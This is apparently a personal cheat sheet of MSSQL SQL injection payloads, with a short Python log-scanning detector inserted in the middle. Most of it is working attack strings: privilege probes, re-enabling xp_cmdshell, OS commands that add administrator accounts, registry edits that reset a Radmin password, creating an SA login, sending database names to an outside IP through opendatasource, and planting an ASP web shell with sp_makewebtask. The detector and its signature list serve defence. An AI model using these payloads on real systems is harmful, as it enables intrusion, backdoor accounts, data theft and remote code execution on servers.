I have a bad memory, so I keep a record of the usual injection code. It is a bit messy, but for me it is very useful; I hope everyone will like it.
Check what permission the current user has.
and 1=(select is_member('db_owner'))
and char(124)%2bcast(is_member('db_owner') as varchar(1))%2bchar(124)=1;--
Detect whether there is permission to read a database
and 1=(select has_dbaccess('master'))
and char(124)%2bcast(has_dbaccess('master') as varchar(1))%2bchar(124)=1--
Numeric type
and char(124)%2buser%2bchar(124)=0
Character type
' and char(124)%2buser%2bchar(124)=0 and '='
Search (LIKE) type
' and char(124)%2buser%2bchar(124)=0 and '%'='
Extract the user name
and user>0
' and user>0 and '='
Detect whether the user has SA permission
and 1=(select is_srvrolemember('sysadmin'));--
and char(124)%2bcast(is_srvrolemember(0x730079007300610064006d0069006e00) as varchar(1))%2bchar(124)=1--
Detect whether the database is MSSQL
and exists (select * from sysobjects);
Detect whether multiple statements (stacked queries) are supported
;declare @d int;--
Restore xp_cmdshell
;exec master..dbo.sp_addextendedproc 'xp_cmdshell','xplog70.dll';--
select * from openrowset('SQLOLEDB','server=192.168.1.200,1433;uid=test;pwd=pafpaf','select @@version')
//-----------------------
Execute command
//-----------------------
First, enable sandbox mode:
exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandboxMode','REG_DWORD',1
Then use Jet.OLEDB to execute system commands
select * from openrowset('microsoft.jet.oledb.4.0',';database=c:\winnt\system32\ias\ias.mdb','select shell("cmd.exe /c net user admin admin1234 /add")')
Execute a command
;declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net user paf pafpaf /add';--
exec [master].[dbo].[xp_cmdshell] 'cmd /c md c:\1111'
Determine whether the xp_cmdshell extended stored procedure exists:
http://192.168.1.5/display.asp?keyno=188 and 1=(select count(*) from master.dbo.sysobjects where xtype='X' and name='xp_cmdshell')
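From the defender's side, the probes listed above (privilege checks, char(124) delimiters, stacked queries, dangerous extended procedures, and the hex-encoded 'sysadmin' argument) are easy to flag in web server logs. The following Python is an added example, not code from the original post: it decodes 0x literals the way MSSQL would and runs a small signature set over constructed sample request lines.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample request lines (path + query string); not from the original page.
SAMPLE_REQUESTS = [
    "/display.asp?keyno=188",
    "/display.asp?keyno=188 and 1=(select count(*) from master.dbo.sysobjects "
    "where xtype='X' and name='xp_cmdshell')",
    "/login.asp?user=a' and char(124)%2bcast(is_srvrolemember("
    "0x730079007300610064006d0069006e00) as varchar(1))%2bchar(124)=1--",
    "/news.asp?id=5;declare @d int;--",
    "/search.asp?q=dramatic films",
]

# Signatures derived from the probes and procedure names in the cheat sheet above.
SIGNATURES = {
    "privilege_probe": r"\b(is_member|is_srvrolemember|has_dbaccess)\s*\(",
    "catalog_probe": r"\b(sysobjects|sysdatabases)\b",
    "stacked_query": r";\s*(declare|exec)\b",
    "dangerous_proc": r"\b(xp_cmdshell|sp_oacreate|xp_regwrite|xp_regread|xp_dirtree"
                      r"|sp_makewebtask|sp_addextendedproc)\b",
    "adhoc_query": r"\b(openrowset|opendatasource)\s*\(",
    "delimiter_trick": r"char\s*\(\s*124\s*\)",
}

# A 0x literal with an even number of hex digits (at least two bytes).
HEX_LITERAL = re.compile(r"0x((?:[0-9a-f]{2}){2,})", re.I)

def decode_hex_literals(text):
    """Replace 0x... literals by their decoded text so that keyword matching also
    covers hex-encoded arguments; MSSQL reads a 0x literal passed to an nvarchar
    parameter as UTF-16LE, so that encoding is tried first."""
    def _sub(match):
        raw = bytes.fromhex(match.group(1))
        for encoding in ("utf-16-le", "latin-1"):
            try:
                decoded = raw.decode(encoding)
            except UnicodeDecodeError:
                continue
            if decoded.isprintable():
                return decoded
        return match.group(0)  # binary-looking literal: leave it as is
    return HEX_LITERAL.sub(_sub, text)

def scan_request(line):
    """Return the sorted list of signature names that match one request line."""
    decoded = decode_hex_literals(unquote_plus(line))
    return sorted(name for name, pattern in SIGNATURES.items()
                  if re.search(pattern, decoded, re.I))
```

Run scan_request over each line of a real access log to get a per-request list of matched signatures; an empty list means nothing from this sheet was seen.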
Write to the registry
exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandboxMode','REG_DWORD',1
(the value type can also be REG_SZ)
Read the registry
exec master..xp_regread 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon','Userinit'
Read directory contents
exec master..xp_dirtree 'c:\winnt\system32\',1,1
Database backup
backup database pubs to disk='c:\123.bak'
Extract a length
and (select char(124)%2bcast(count(1) as varchar(8000))%2bchar(124) from d99_tmp)=0;--
Method to change the sa password: after connecting with the SQL comprehensive tool, execute the command:
exec sp_password null,'new password','sa'
Add a login test and grant it SA permission:
exec master.dbo.sp_addlogin test,ptlove
exec master.dbo.sp_addsrvrolemember test,sysadmin
Statement to delete the extended stored procedure xp_cmdshell:
exec sp_dropextendedproc 'xp_cmdshell'
Add an extended stored procedure
exec [master].sp_addextendedproc 'xp_proxiedadata','c:\winnt\system32\sqllog.dll'
grant exec on xp_proxiedadata to public
Stop or start a service.
exec master..xp_servicecontrol 'stop','schedule'
exec master..xp_servicecontrol 'start','schedule'
dbo.xp_subdirs
Lists only the subdirectories under a directory.
xp_getfiledetails 'c:\inetpub\wwwroot\sqlinject\login.asp'
dbo.xp_makecab
Compresses multiple files into a target file.
All files to be compressed are appended at the end of the parameter list, separated by commas.
dbo.xp_makecab
'c:\test.cab','mszip',1,
'c:\inetpub\wwwroot\sqlinject\login.asp',
'c:\inetpub\wwwroot\sqlinject\securelogin.asp'
xp_terminate_process
Terminates a running program; the parameter given is the process ID.
In Task Manager, open the menu View - Select Columns and check PID to see the process ID of each running program.
xp_terminate_process 2484
xp_unpackcab
Extracts a compressed file.
xp_unpackcab 'c:\test.cab','c:\temp',1
On one machine Radmin was installed but its password had been changed; regedit.exe had been deleted or renamed, and net.exe did not exist, so there was no way to use regedit /e to import a registry file. MSSQL, however, had SA permission, so the following command could be used: EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','system\radmin\v2.0\server\parameters','Parameter','reg_binary',0X02BA5E187E2589BE6F80DA0046AA7E3C changes the password to 12345678. To modify the port value, EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','system\radmin\v2.0\server\parameters','Port','reg_binary',0xd20400 sets the port to 1234.
create database lcx;
create table ku (name nvarchar(256) null);
create table biao (id int null,name nvarchar(256) null);
Get the database names
insert into opendatasource('SQLOLEDB','server=211.39.145.163,1443;uid=test;pwd=pafpaf;database=lcx').lcx.dbo.ku select name from master.dbo.sysdatabases
Create a table in master to see what permissions you have
create table master..d_test(id nvarchar(4000) null,data nvarchar(4000) null);--
Write a file directly into the web directory with sp_makewebtask:
http://127.0.0.1/dblogin123.asp?username=123';exec%20sp_makewebtask%20'd:\www\tt\88.asp','%20select%20'<%25execute(Request("a"))%25>'%20';--
Update table contents
update films set kind='dramatic' where id=123
Delete contents
delete from table_name where stockid=3